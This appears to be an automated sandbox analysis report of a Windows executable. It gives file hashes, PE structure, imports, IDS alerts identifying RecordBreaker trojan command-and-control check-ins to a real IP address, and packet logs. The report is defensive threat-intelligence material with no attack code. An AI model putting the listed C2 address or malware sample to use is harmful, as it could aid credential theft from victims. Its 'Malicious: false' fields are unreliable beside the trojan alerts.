SHA-512:	4048EEA5A78DD569521C488C4CE4F7B77AC0454C92EE9107A81A1B3AF91A4EE036039AC1A0A6B8DD26B12E7F1595DB80B7FAA7B6A25D9032BF385528A81A8654
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...HIDATx......0.CQS.......~..."..........m.v+Sq....<!...M8m...'...@$..0....E........IEND.B`.

C:\Users\user\AppData\Local\Temp\scoped_dir4872_1835717667\CRX_INSTALL\images\topbar_floating_button_pressed.png

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	160
Entropy (8bit):	5.46068685940762
Encrypted:	false
SSDEEP:
MD5:	E0862317407F2D54C85E12945799413B
SHA1:	FA557F8F761A04C41C9A4BA81994E43C6C275DBB
SHA-256:	5C10CE0589EB115600F77381130B70AE0B7B3752614D86D4C89E857658AA222B
SHA-512:	07CB69327961FD0019BEF8EF7590B5524905AC373A815F73F6D9E0B26840929F919A96CAA977D4B5656704DACD0F352D568FB3997F80EE6BB94C95B58839DBFE
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...BIDATx...A..0...+B..@wu...*.....$.<u..[...................h.........M..x(....IEND.B`.

C:\Users\user\AppData\Local\Temp\scoped_dir4872_1835717667\CRX_INSTALL\manifest.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1322
Entropy (8bit):	5.449026004350873
Encrypted:	false
SSDEEP:
MD5:	01334FB9D092AF2AA46C4185E405C627
SHA1:	47AD3C0E82362FFE5B881DF8D71D6F79AB7F5796
SHA-256:	F52714812D68C577A445169D11E84DF6751C2D6886BC429643072BB5D61C6C27
SHA-512:	888D96ADB7A847ABE472145258C8C46950EB2FA3BA7D596C2E90A17C8FB06FD0155C56CC8ABA5D076D89368417464BCB2D236F9E40E53241950A01F9F8ED548F
Malicious:	false
Reputation:	unknown
Preview:	{.. "app": {.. "background": {.. "scripts": [ "craw_background.js" ].. }.. },.. "default_locale": "en",.. "description": "__MSG_APP_DESCRIPTION__",.. "display_in_launcher": false,.. "display_in_new_tab_page": false,.. "icons": {.. "128": "images/icon_128.png",.. "16": "images/icon_16.png".. },.. "key": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCrKfMnLqViEyokd1wk57FxJtW2XXpGXzIHBzv9vQI/01UsuP0IV5/lj0wx7zJ/xcibUgDeIxobvv9XD+zO1MdjMWuqJFcKuSS4Suqkje6u+pMrTSGOSHq1bmBVh0kpToN8YoJs/P/yrRd7FEtAXTaFTGxQL4C385MeXSjaQfiRiQIDAQAB",.. "manifest_version": 2,.. "minimum_chrome_version": "29",.. "name": "__MSG_APP_NAME__",.. "oauth2": {.. "auto_approve": true,.. "client_id": "203784468217.apps.googleusercontent.com",.. "scopes": [ "https://www.googleapis.com/auth/sierra", "https://www.googleapis.com/auth/sierrasandbox", "https://www.googleapis.com/auth/chromewebstore", "https://www.googleapis.com/auth/chromewebstore.readonly" ].. },.

C:\Users\user\TypeRes\DllResource.exe

Download File

Process:	C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	151846912
Entropy (8bit):	0.18439745450070227
Encrypted:	false
SSDEEP:
MD5:	B066BF24924F41A4CC4562B730F20456
SHA1:	C36D2DD273106AFCB08FA80E92F07EE53E1EB8E6
SHA-256:	45FA90D11D5DC9BBEAF4FD56748E782BB7E9FCEF88716B4038F1834F4D51C0A0
SHA-512:	0582079A85A56322A3D4175302F1C8DB7B4457EAA17A1FC62CBEADDD29657330613741E08ECD785317976EBF9DDB661FD3047E7847B4D96C33983A6658FF0041
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........\.u.\.u.\.u.3...T.u.3.....u.U...Y.u.\.t..u.3...S.u.3...].u.\...Z.u.3...].u.Rich\.u.........................PE..L...\|..X............................`R............@.................................u.......................................d...<.......(............................................................*..@...............8............................text............................... ..`.data....;..........................@....rsrc...(...........................@..@........................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.965203844894291
TrID:	Win32 Executable (generic) a (10002005/4) 99.24% InstallShield setup (43055/19) 0.43% Win32 Executable Delphi generic (14689/80) 0.15% Windows Screen Saver (13104/52) 0.13% Win16/32 Executable Delphi generic (2074/23) 0.02%
File name:	WSkT8d093C.exe
File size:	2772338
MD5:	e0118ad4299455683d5d0708772742ef
SHA1:	c80a27155317c3d08308cf8a55e4790f429bb2dd
SHA256:	6acec3474a2dcacc99fe7f6495d4e4e90adbb40de283054aadad2e8f91dbd115
SHA512:	c6e9de83cbc63505359fb745f5417977df30445ab87d848081d526c8afe1ecb1ffa075bb80370862cd7d57b50c5dc23e68aac784f8e845a9d7195e6eb1ed99ec
SSDEEP:	49152:pAI+1NpJc7YrEa2u2hq3PGh0p4EyqaeFEqLh09fqNZesF+AxnMtQSOanD9:pAI+vc8rHJ283PGi4EyduRLh0MNZesFS
TLSH:	96D5333A62C1403BD6921AB24D9BC7FAF936F5041B3CB0DEBDDD0D1C84176485ABA16E
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	a2a0b496b2caca72

Static PE Info

General

Entrypoint:	0x425468
Entrypoint Section:	CODE
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	c9adc83b45e363b21cd6b11b5da0501f

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 00425388h
call 00007F3FD0C7A2C9h
mov eax, 004254C8h
call 00007F3FD0C7CCCFh
mov edx, dword ptr [00428840h]
mov dword ptr [edx], eax
mov edx, dword ptr [00428840h]
mov edx, dword ptr [edx]
mov eax, dword ptr [00428848h]
call 00007F3FD0C98489h
mov edx, dword ptr [00428840h]
mov edx, dword ptr [edx]
mov eax, dword ptr [004287DCh]
call 00007F3FD0C9151Fh
mov eax, dword ptr [00428840h]
call 00007F3FD0C7FF51h
call 00007F3FD0C79184h
add byte ptr [eax], al
add bh, bh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2b000	0x1798	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x31000	0x1cdc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2f000	0x1884	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x2e000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
CODE	0x1000	0x244cc	0x24600	False	0.5598689862542955	data	6.5944280484489814	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA	0x26000	0x2894	0x2a00	False	0.31556919642857145	data	3.7937570409882295	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS	0x29000	0x10f5	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x2b000	0x1798	0x1800	False	0.3977864583333333	data	4.885545060649106	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x2d000	0x8	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x2e000	0x18	0x200	False	0.05078125	data	0.2044881574398449	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc	0x2f000	0x1884	0x1a00	False	0.7889122596153846	data	6.586647864611828	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc	0x31000	0x1cdc	0x1e00	False	0.3592447916666667	data	4.75165483227057	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x31270	0x128	GLS_BINARY_LSB_FIRST
RT_ICON	0x31398	0x568	GLS_BINARY_LSB_FIRST
RT_ICON	0x31900	0x2e8	data
RT_ICON	0x31be8	0x8a8	data
RT_RCDATA	0x32490	0x10	data
RT_RCDATA	0x324a0	0x110	data
RT_GROUP_ICON	0x325b0	0x3e	data
RT_VERSION	0x325f0	0x374	data	Russian	Russia
RT_MANIFEST	0x32964	0x376	XML 1.0 document, ASCII text, with CRLF line terminators	Russian	Russia

Imports

DLL	Import
kernel32.dll	DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, WideCharToMultiByte, GetThreadLocale, GetStartupInfoA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
user32.dll	GetKeyboardType, MessageBoxA
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll	SysFreeString, SysReAllocStringLen
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll	RegCloseKey, OpenThreadToken, OpenProcessToken, GetTokenInformation, FreeSid, EqualSid, AllocateAndInitializeSid, AdjustTokenPrivileges
kernel32.dll	WriteFile, WinExec, WaitForSingleObject, TerminateProcess, SystemTimeToFileTime, Sleep, SetFileTime, SetFilePointer, SetErrorMode, SetEndOfFile, ReadFile, OpenProcess, MultiByteToWideChar, LocalFileTimeToFileTime, LoadLibraryA, GlobalFree, GlobalAlloc, GetVersion, GetUserDefaultLangID, GetProcAddress, GetModuleHandleA, GetLocalTime, GetLastError, GetFileTime, GetFileSize, GetExitCodeProcess, GetCurrentThread, GetCurrentProcess, FreeLibrary, FindClose, FileTimeToSystemTime, FileTimeToLocalFileTime, DosDateTimeToFileTime, CompareFileTime, CloseHandle
gdi32.dll	StretchDIBits, StretchBlt, SetWindowOrgEx, SetTextColor, SetStretchBltMode, SetRectRgn, SetROP2, SetPixel, SetDIBits, SetBrushOrgEx, SetBkMode, SetBkColor, SelectObject, SaveDC, RestoreDC, OffsetRgn, MoveToEx, IntersectClipRect, GetStockObject, GetPixel, GetDIBits, ExtSelectClipRgn, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreateRectRgn, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CombineRgn, BitBlt
user32.dll	WaitMessage, ValidateRect, TranslateMessage, ShowWindow, SetWindowPos, SetTimer, SetParent, SetForegroundWindow, SetFocus, SetCursor, SendMessageA, ScreenToClient, ReleaseDC, PostQuitMessage, OffsetRect, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsIconic, InvalidateRect, GetWindowRgn, GetWindowRect, GetWindowDC, GetUpdateRgn, GetSystemMetrics, GetSystemMenu, GetSysColor, GetParent, GetWindow, GetKeyState, GetFocus, GetDCEx, GetDC, GetCursorPos, GetClientRect, GetCapture, FillRect, ExitWindowsEx, EnumWindows, EndPaint, EnableWindow, EnableMenuItem, DrawIcon, DestroyWindow, DestroyIcon, DeleteMenu, CopyImage, ClientToScreen, BeginPaint, CharLowerBuffA
winmm.dll	timeKillEvent, timeSetEvent
oleaut32.dll	SysAllocStringLen
ole32.dll	OleInitialize
comctl32.dll	ImageList_Draw, ImageList_SetBkColor, ImageList_Create, InitCommonControls
shell32.dll	SHGetFileInfoA
user32.dll	wvsprintfA, SetWindowLongA, SetPropA, SendMessageA, RemovePropA, RegisterClassA, PostMessageA, PeekMessageA, MessageBoxA, LoadIconA, LoadCursorA, GetWindowTextLengthA, GetWindowTextA, GetWindowLongA, GetPropA, GetClassLongA, GetClassInfoA, FindWindowA, DrawTextA, DispatchMessageA, DefWindowProcA, CreateWindowExA, CallWindowProcA
gdi32.dll	GetTextExtentPoint32A, GetObjectA, CreateFontIndirectA, AddFontResourceA
kernel32.dll	WritePrivateProfileStringA, SetFileAttributesA, SetCurrentDirectoryA, RemoveDirectoryA, LoadLibraryA, GetWindowsDirectoryA, GetVersionExA, GetTimeFormatA, GetTempPathA, GetSystemDirectoryA, GetShortPathNameA, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetFullPathNameA, GetFileAttributesA, GetDiskFreeSpaceA, GetDateFormatA, GetComputerNameA, GetCommandLineA, FindNextFileA, FindFirstFileA, ExpandEnvironmentStringsA, DeleteFileA, CreateFileA, CreateDirectoryA, CompareStringA
advapi32.dll	RegSetValueExA, RegQueryValueExA, RegQueryInfoKeyA, RegOpenKeyExA, RegEnumKeyExA, RegCreateKeyExA, LookupPrivilegeValueA, GetUserNameA
shell32.dll	ShellExecuteExA, ShellExecuteA
cabinet.dll	FDIDestroy, FDICopy, FDICreate
ole32.dll	OleInitialize, CoTaskMemFree, CoCreateInstance, CoUninitialize, CoInitialize
shell32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetMalloc, SHChangeNotify, SHBrowseForFolderA

Possible Origin

Language of compilation system	Country where language is spoken	Map
Russian	Russia

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.345.95.11.15849774802038485 08/23/22-03:42:46.138066	TCP	2038485	ET TROJAN Win32/RecordBreaker - Observed UA M1	49774	80	192.168.2.3	45.95.11.158
192.168.2.345.95.11.15849774802038486 08/23/22-03:42:57.736003	TCP	2038486	ET TROJAN Win32/RecordBreaker - Observed UA M2	49774	80	192.168.2.3	45.95.11.158
192.168.2.345.95.11.15849774802038487 08/23/22-03:42:57.736003	TCP	2038487	ET TROJAN Win32/RecordBreaker - Library Request	49774	80	192.168.2.3	45.95.11.158
45.95.11.158192.168.2.380497742036955 08/23/22-03:42:46.301580	TCP	2036955	ET TROJAN Win32/RecordBreaker CnC Checkin - Server Response	80	49774	45.95.11.158	192.168.2.3
192.168.2.345.95.11.15849774802036934 08/23/22-03:42:46.138066	TCP	2036934	ET TROJAN Win32/RecordBreaker CnC Checkin M1	49774	80	192.168.2.3	45.95.11.158

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 23, 2022 03:42:33.563246012 CEST	49726	443	192.168.2.3	142.251.209.46
Aug 23, 2022 03:42:33.563287020 CEST	443	49726	142.251.209.46	192.168.2.3
Aug 23, 2022 03:42:33.563365936 CEST	49726	443	192.168.2.3	142.251.209.46
Aug 23, 2022 03:42:33.563954115 CEST	49726	443	192.168.2.3	142.251.209.46
Aug 23, 2022 03:42:33.563963890 CEST	443	49726	142.251.209.46	192.168.2.3
Aug 23, 2022 03:42:33.564382076 CEST	49727	443	192.168.2.3	142.250.180.141
Aug 23, 2022 03:42:33.564410925 CEST	443	49727	142.250.180.141	192.168.2.3
Aug 23, 2022 03:42:33.564476013 CEST	49727	443	192.168.2.3	142.250.180.141
Aug 23, 2022 03:42:33.564743996 CEST	49727	443	192.168.2.3	142.250.180.141
Aug 23, 2022 03:42:33.564762115 CEST	443	49727	142.250.180.141	192.168.2.3
Aug 23, 2022 03:42:33.640244007 CEST	443	49727	142.250.180.141	192.168.2.3
Aug 23, 2022 03:42:33.642515898 CEST	443	49726	142.251.209.46	192.168.2.3
Aug 23, 2022 03:42:33.705542088 CEST	49727	443	192.168.2.3	142.250.180.141
Aug 23, 2022 03:42:33.705552101 CEST	49726	443	192.168.2.3	142.251.209.46
Aug 23, 2022 03:42:33.708190918 CEST	49726	443	192.168.2.3	142.251.209.46
Aug 23, 2022 03:42:33.708209991 CEST	443	49726	142.251.209.46	192.168.2.3
Aug 23, 2022 03:42:33.708458900 CEST	49727	443	192.168.2.3	142.250.180.141
Aug 23, 2022 03:42:33.708482027 CEST	443	49727	142.250.180.141	192.168.2.3
Aug 23, 2022 03:42:33.708937883 CEST	443	49726	142.251.209.46	192.168.2.3
Aug 23, 2022 03:42:33.708978891 CEST	443	49726	142.251.209.46	192.168.2.3
Aug 23, 2022 03:42:33.709058046 CEST	49726	443	192.168.2.3	142.251.209.46
Aug 23, 2022 03:42:33.710448980 CEST	443	49727	142.250.180.141	192.168.2.3
Aug 23, 2022 03:42:33.710510015 CEST	443	49727	142.250.180.141	192.168.2.3
Aug 23, 2022 03:42:33.710536003 CEST	49727	443	192.168.2.3	142.250.180.141
Aug 23, 2022 03:42:33.711287975 CEST	443	49726	142.251.209.46	192.168.2.3
Aug 23, 2022 03:42:33.711366892 CEST	49726	443	192.168.2.3	142.251.209.46
Aug 23, 2022 03:42:33.711383104 CEST	443	49726	142.251.209.46	192.168.2.3
Aug 23, 2022 03:42:33.805572033 CEST	49727	443	192.168.2.3	142.250.180.141
Aug 23, 2022 03:42:33.805762053 CEST	49726	443	192.168.2.3	142.251.209.46
Aug 23, 2022 03:42:34.158397913 CEST	49728	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:34.158438921 CEST	443	49728	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:34.158565044 CEST	49728	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:34.166912079 CEST	49729	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:34.166970015 CEST	443	49729	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:34.167113066 CEST	49729	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:34.168450117 CEST	49730	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:34.168483973 CEST	443	49730	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:34.168591022 CEST	49730	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:34.178117990 CEST	49732	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:34.178178072 CEST	443	49732	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:34.178380013 CEST	49732	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:34.178734064 CEST	49726	443	192.168.2.3	142.251.209.46
Aug 23, 2022 03:42:34.178895950 CEST	443	49726	142.251.209.46	192.168.2.3
Aug 23, 2022 03:42:34.179491997 CEST	49728	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:34.179521084 CEST	443	49728	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:34.179982901 CEST	49727	443	192.168.2.3	142.250.180.141
Aug 23, 2022 03:42:34.180192947 CEST	443	49727	142.250.180.141	192.168.2.3
Aug 23, 2022 03:42:34.181395054 CEST	49729	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:34.181425095 CEST	443	49729	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:34.181979895 CEST	49730	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:34.182028055 CEST	443	49730	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:34.182797909 CEST	49732	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:34.182832956 CEST	443	49732	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:34.184508085 CEST	49726	443	192.168.2.3	142.251.209.46
Aug 23, 2022 03:42:34.184544086 CEST	443	49726	142.251.209.46	192.168.2.3
Aug 23, 2022 03:42:34.184639931 CEST	49727	443	192.168.2.3	142.250.180.141
Aug 23, 2022 03:42:34.184669971 CEST	443	49727	142.250.180.141	192.168.2.3
Aug 23, 2022 03:42:34.224891901 CEST	443	49726	142.251.209.46	192.168.2.3
Aug 23, 2022 03:42:34.224981070 CEST	443	49726	142.251.209.46	192.168.2.3
Aug 23, 2022 03:42:34.225373983 CEST	49726	443	192.168.2.3	142.251.209.46
Aug 23, 2022 03:42:34.251678944 CEST	443	49727	142.250.180.141	192.168.2.3
Aug 23, 2022 03:42:34.251816988 CEST	443	49727	142.250.180.141	192.168.2.3
Aug 23, 2022 03:42:34.252334118 CEST	49727	443	192.168.2.3	142.250.180.141
Aug 23, 2022 03:42:34.265968084 CEST	443	49729	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:34.269417048 CEST	443	49732	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:34.269480944 CEST	443	49730	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:34.271770954 CEST	443	49728	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:34.296417952 CEST	49728	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:34.296432972 CEST	443	49728	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:34.298316002 CEST	443	49728	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:34.298831940 CEST	49728	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:34.304130077 CEST	49730	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:34.304183006 CEST	443	49730	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:34.304321051 CEST	49732	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:34.304368019 CEST	443	49732	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:34.304693937 CEST	49729	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:34.304738998 CEST	443	49729	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:34.305562019 CEST	49727	443	192.168.2.3	142.250.180.141
Aug 23, 2022 03:42:34.305594921 CEST	443	49727	142.250.180.141	192.168.2.3
Aug 23, 2022 03:42:34.305929899 CEST	443	49729	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:34.306035995 CEST	49729	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:34.306492090 CEST	443	49730	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:34.306629896 CEST	49730	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:34.306658030 CEST	49726	443	192.168.2.3	142.251.209.46
Aug 23, 2022 03:42:34.306682110 CEST	443	49726	142.251.209.46	192.168.2.3
Aug 23, 2022 03:42:34.307288885 CEST	443	49732	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:34.307396889 CEST	49732	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:34.396595001 CEST	49728	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:34.396970987 CEST	443	49728	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:34.397183895 CEST	49728	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:34.397198915 CEST	443	49728	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:34.397558928 CEST	49729	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:34.397618055 CEST	49732	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:34.397717953 CEST	443	49729	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:34.397887945 CEST	443	49732	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:34.397964001 CEST	49730	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:34.398068905 CEST	443	49730	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:34.398670912 CEST	49729	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:34.398705006 CEST	443	49729	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:34.398927927 CEST	49732	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:34.398945093 CEST	443	49732	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:34.423576117 CEST	443	49728	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:34.423759937 CEST	49728	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:34.424396038 CEST	443	49729	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:34.424485922 CEST	49729	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:34.424772978 CEST	443	49732	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:34.424861908 CEST	49732	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:34.428567886 CEST	49728	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:34.428603888 CEST	443	49728	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:34.429514885 CEST	49729	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:34.429548025 CEST	443	49729	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:34.430223942 CEST	49732	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:34.430250883 CEST	443	49732	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:34.505646944 CEST	49730	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:34.505676985 CEST	443	49730	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:34.605623960 CEST	49730	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:35.202745914 CEST	49730	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:35.226478100 CEST	443	49730	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:35.226823092 CEST	443	49730	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:35.226964951 CEST	49730	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:35.424195051 CEST	49730	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:35.424237967 CEST	443	49730	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:36.028557062 CEST	49739	443	192.168.2.3	142.251.209.4
Aug 23, 2022 03:42:36.028614044 CEST	443	49739	142.251.209.4	192.168.2.3
Aug 23, 2022 03:42:36.028729916 CEST	49739	443	192.168.2.3	142.251.209.4
Aug 23, 2022 03:42:36.029036045 CEST	49739	443	192.168.2.3	142.251.209.4
Aug 23, 2022 03:42:36.029052019 CEST	443	49739	142.251.209.4	192.168.2.3
Aug 23, 2022 03:42:36.093816996 CEST	443	49739	142.251.209.4	192.168.2.3
Aug 23, 2022 03:42:36.109325886 CEST	49739	443	192.168.2.3	142.251.209.4
Aug 23, 2022 03:42:36.109369040 CEST	443	49739	142.251.209.4	192.168.2.3
Aug 23, 2022 03:42:36.110960007 CEST	443	49739	142.251.209.4	192.168.2.3
Aug 23, 2022 03:42:36.111093044 CEST	49739	443	192.168.2.3	142.251.209.4
Aug 23, 2022 03:42:36.113750935 CEST	49739	443	192.168.2.3	142.251.209.4
Aug 23, 2022 03:42:36.113893986 CEST	443	49739	142.251.209.4	192.168.2.3
Aug 23, 2022 03:42:36.162744999 CEST	49739	443	192.168.2.3	142.251.209.4
Aug 23, 2022 03:42:36.162777901 CEST	443	49739	142.251.209.4	192.168.2.3
Aug 23, 2022 03:42:36.332915068 CEST	49741	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:36.332967043 CEST	443	49741	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:36.333064079 CEST	49741	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:36.337184906 CEST	49741	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:36.337236881 CEST	443	49741	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:36.362807989 CEST	49739	443	192.168.2.3	142.251.209.4
Aug 23, 2022 03:42:36.427946091 CEST	443	49741	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:36.428100109 CEST	49741	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:36.529104948 CEST	49741	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:36.529150963 CEST	443	49741	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:36.529932976 CEST	443	49741	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:36.530026913 CEST	49741	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:36.533245087 CEST	49741	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:36.563451052 CEST	443	49741	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:36.563591003 CEST	443	49741	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:36.563651085 CEST	49741	443	192.168.2.3	148.251.234.83
